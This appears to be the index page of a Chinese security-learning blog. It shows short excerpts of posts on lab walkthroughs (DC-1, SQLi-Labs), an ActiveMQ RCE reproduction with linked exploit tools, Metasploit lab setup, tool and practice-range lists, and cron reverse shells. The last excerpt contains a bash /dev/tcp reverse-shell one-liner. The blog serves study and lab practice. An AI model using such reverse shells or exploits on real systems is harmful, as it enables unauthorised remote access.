DC-1
写写打靶记录。
靶机地址:https://www.vulnhub.com/entry/dc-1
本篇文章参考:
https://blog.csdn.net/nzjdsds/article/details/114484232
https://blog.csdn.net/RestoreJustice/article/details/129612792
信息收集
注:难得一台可以使用 VMware Workstation 直接打开的靶机。
首先查看 Kali IP 地址:
12345678910111213141516171819root at kali in ~ $ ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.8.15 netmask 255.255.255.0 broadcast 10.10.8.255 inet6 fe80::c6b4:c54f:b3d3:4226 prefixlen 64 scopeid 0x20 ...
CTFd 动态 Web 题制作
继上一篇 CTFd 搭建之后,紧接着要部署 Web 题了,这里比较麻烦,不过总会有解决办法的。
个人水平有限,Web 题主要是基于 PHP 语言搭建的,不过市面上大部分 CTF 比赛 PHP 占比还是蛮大的。
本篇文章参考:
https://www.anyiblog.top/2023/04/13/20230413
https://github.com/ctfhub-team/base_image
基础环境说明常用镜像
本篇文章所有镜像均采用 CTFHub 公开的环境基础镜像,主要使用镜像如下:
镜像名称
环境版本
web_httpd
Debian 12 (bookworm) amd64Apache/2.4.57
web_nginx
Debian 12 (bookworm) amd64nginx/1.22.1
web_httpd_php_5.6
Debian 9 (stretch) amd64Apache/2.4.25PHP 5.6.40
web_httpd_php_7.4
Debian 11 (bullseye) amd6 ...
ActiveMQ RCE(CVE-2023-46604)
在上上上周,好基友突然发来一条关于 ActiveMQ 的漏洞通告,看着是个 0 day,问了下是体制内的通告,那没事了。
紧接着在上上周,就出现 ActiveMQ-RCE 的漏洞通报和漏洞利用文章了,可真快。
这周正好有点空,简单复现一下,原理稍微有点复杂,还是当脚本小子吧(QAQ)。
本篇文章参考:
https://mp.weixin.qq.com/s/tCY2RAXG5SCYVPuNhpefsw
https://mp.weixin.qq.com/s/MYo5AcGCj17L-viPst3Bag
https://blog.csdn.net/xuandaoren/article/details/134137453
https://xz.aliyun.com/t/12929
本篇文章工具:
https://github.com/X1r0z/ActiveMQ-RCE
https://github.com/sincere9/Apache-ActiveMQ-RCE
https://github.com/Fw-fW-fw/activemq_Throwable
https://github. ...
VMware Worksation 虚拟机性能调优
自从上半年换了电脑,VMware Workstation 开启的虚拟机就莫名其妙的卡。
卡的地方还很特殊,鼠标和应用都没事儿,就偏偏 Shell 敲命令的时候延迟贼高。
之前都是 SSH 协议用 Xshell 凑合连,最近实在受不了了,花费近一天的时间把这问题解决了。
忘记是哪一步解决的了,干脆就全部列举出来。
参考文章:
https://www.cnblogs.com/kinome/p/9897731.html
https://www.ddosi.org/vmware17/
https://blog.csdn.net/ArthurCai/article/details/130068796
本机配置:
OS Version:Windows 11 专业版
VM Version:VMware Workstation 17.0.0 Pro
Other:i9-13980HX、32G
VMware Workstation 键鼠输入延迟内存&CPU
由于 Kali Linux 默认是 2G、4核,自身电脑是32G、24核,所以这里将 Kali Linux 虚拟机配 ...
您读过的最简单的 Metasploit 指南
本篇文章相当于 Scott Morris – Andronicus 大佬的文章的译作,加上一点自己的理解。
文章原地址:The Easiest Metasploit Guide You’ll Ever Read
概述
本指南适用于那些了解 Metasploit 是什么、想要学习使用它但不太确定如何开始的人。我们将介绍在工作站上设置实验室的基础知识。
无论您使用 Windows 还是 Linux 作为主机操作系统,本指南都适合您。
将设置以下内容:
VMWare Workstation Pro
Metasploitable-linux-2
Nessus
Kali Linux
前情提要
因为不想详尽地涵盖每一个细节,所以我必须对读者做出一些假设。
您应该已经熟悉以下内容:
如何在操作系统上安装软件(包含:Windows、Linux)
熟悉 Linux 命令行
网络和协议的基础知识
文本编辑器(VIM)
耐心 - 需要很多实践&时间
研究意愿 - 学习兴趣
下载文件,并学习使用他们
使用 Telnet、VNC、FTP 和其他类似的网络客户端
从本质上讲,您应该是一个“P ...
Sec Tools 整理
本篇文章依据:
https://github.com/guchangan1/All-Defense-Tool
免责声明
重点提醒:本项目工具来源于互联网,是否含带木马及后门请自行甄别!!(尤其是 HW 期间)
本文章所有内容,仅供学习和研究使用,请勿使用项目的技术手段用于非法用途,任何人造成的任何负面影响,与本人无瓜。
本文章所有内容、新闻皆不代表本人态度、立场,如果有建议或方案,欢迎来电。
本文章所有内容、展示的所有工具链接与本人无任何利害关系。
前置工具虚拟机&镜像
工具名称
工具地址
工具说明
VMware Workstation
传送门
VMware Workstation
Virtual Box
传送门
Virtual Box
Kali Linux
传送门
让我康康,谁没用过
Windows ISO
传送门
MSDN
编辑器
工具名称
工具地址
工具说明
Notepad++
传送门
替换 Windows 默认 TXT
Idea
传送门
还得是他
PyCharm
传送门
还得是他
PhpStorm
传送门
还得是 ...
Sec Range 整理
整理一下自己见过的靶场吧,方便查找,免得天天去百度。
有看见不错的就放上来,不定期更新~
Web 靶场SQL Injection
靶场名称
靶场地址
靶场说明
sqli-labs(php5)
传送门
SQL 注入靶场开山祖师级别
sqli-labs(php7)
传送门
祖师不支持 PHP7,有大佬改了一下
sqli-labs(php7)
传送门
由于没传在 GitHub 上,我拷一份到自己的仓库
XSS Injection
靶场名称
靶场地址
靶场说明
xss-labs
传送门
XSS 注入靶场开山祖师级别
xssgame
传送门
国光大佬改版,会好用一点
Upload File
靶场名称
靶场地址
靶场说明
upload-labs
传送门
文件上传靶场开山祖师级别
upload-labs-docker
传送门
国光大佬改版,使用 Docker 搭建
XXE Injection
靶场名称
靶场地址
靶场说明
xxe-lab
传送门
包含 php、java、python等语言版本的小靶场
JSON Web Tok ...
PhpStorm 配置 Xdebug 代码审计环境
参考文章:
https://www.sqlsec.com/2020/09/xdebug.html
https://blog.csdn.net/oqqZuo_1234567/article/details/127799079
https://www.cnblogs.com/wlwman/p/17673520.html
https://www.cnblogs.com/beidaxmf/p/14527335.html
之前一直想配置一个 PHP 的代码审计环境,但是又不常用。最近刚好有培训要用到这块,整理一下内容方便后续上课使用(坑是真的多,淦)。
CentOS7 + BT + Xdebug
有的伙伴会有疑问,为什么要使用宝塔,而不是像 PhpStudy、LNMP 等环境工具。
其实理由非常简单,宝塔的几乎个个版本都封装了 Xdebug,这就让安装的过程就变得很简单。
其次,Xdebug 官网对于 Linux 只提供了源码安装,编译过程很容易失败(失败了 N 次)。
CentOS7 + BT 安装
之前有写过 Ubuntu18.04 和宝塔的安装文章, ...
SQLi-Labs(Basic Challenges)
本篇文章参考自:
lcamry 的博客 - https://www.cnblogs.com/lcamry
lcamry 的文章 - https://files.cnblogs.com/files/lcamry/mysql-injection.pdf(MySQL 注入天书)
国光的文章 - https://www.sqlsec.com/2020/05/sqlilabs.html
注:这里引用自 lcamry 的前言,简单修改了一下,也比较符合自己的处境。
前言
最初看到 SQLi-Labs 也是好几年之前了,依稀记得是在 2019 年,那时候玩了前面的几个关卡,就没有继续下去了。
前几年又因为夯实基础,回头把 SQLi-Labs 刷完了,并写成文档放在了语雀上。
最近因某种原因有需要用到 SQLi-Labs,所以翻出来看了一下。看着熟悉的代码,仿佛看着当初刚学安全的自己。
当初学习安全老累了,网上能找到的资料并不多,不像现在这样的信息爆炸。前几天迪总为了打击盗版,还把自己的课公开了,以前哪有这种好事儿。大伙都是藏着掖着,也很正常,正所谓教会徒弟饿死师傅。
最近也是脑门一热,决 ...
Linux 计划任务反弹 Shell 探究
本篇文章参考自:
https://mp.weixin.qq.com/s/rmUXqYulX3pyrNfINk90WQ
看本篇文章之前,建议阅读一下之前写的:Linux Bash Shell 探究,不然容易把人看蒙。
计划任务功能在 Windows 系统、Linux 系统中历史很悠久了,方便运维管理。
而在渗透测试中,利用到计划任务的常见的有:挖矿病毒、Redis 未授权、Docker 特权模式逃逸、Cron 提权等,但是在 RedHat 系与 Debian 系 Linux 的计划任务是有一定的区别的,不仔细研究一下遇到了真的很折磨人(深受其害,每次遇到都是问题,淦)。
想起来之前学习 ActiveMQ 漏洞时使用 Corn 提权在 Kali 上复现了一遍,就踩了不少坑。
果然,懒惰乃万恶之源,是时候还债了。
注:本篇文章主要选取两系中的一个作为演示
RedHat 系:CentOS 7 - 10.10.8.137
Debian 系:Kali 2023.3 - 10.10.8.134
问题列举
bash -i >& /dev/tcp/ip/port ...